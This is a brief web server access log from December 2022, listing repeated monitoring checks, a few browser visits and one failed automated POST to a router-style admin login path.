212.91.246.72 - - [01/Dec/2022:17:26:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.134.134 - - [01/Dec/2022:17:27:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:17:27:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:28:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:29:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.248.42 - - [01/Dec/2022:17:29:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
81.225.172.28 - - [01/Dec/2022:17:30:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Dec/2022:17:30:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.21.172.128 - - [01/Dec/2022:17:31:03 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Dec/2022:17:31:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2022:17:32:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
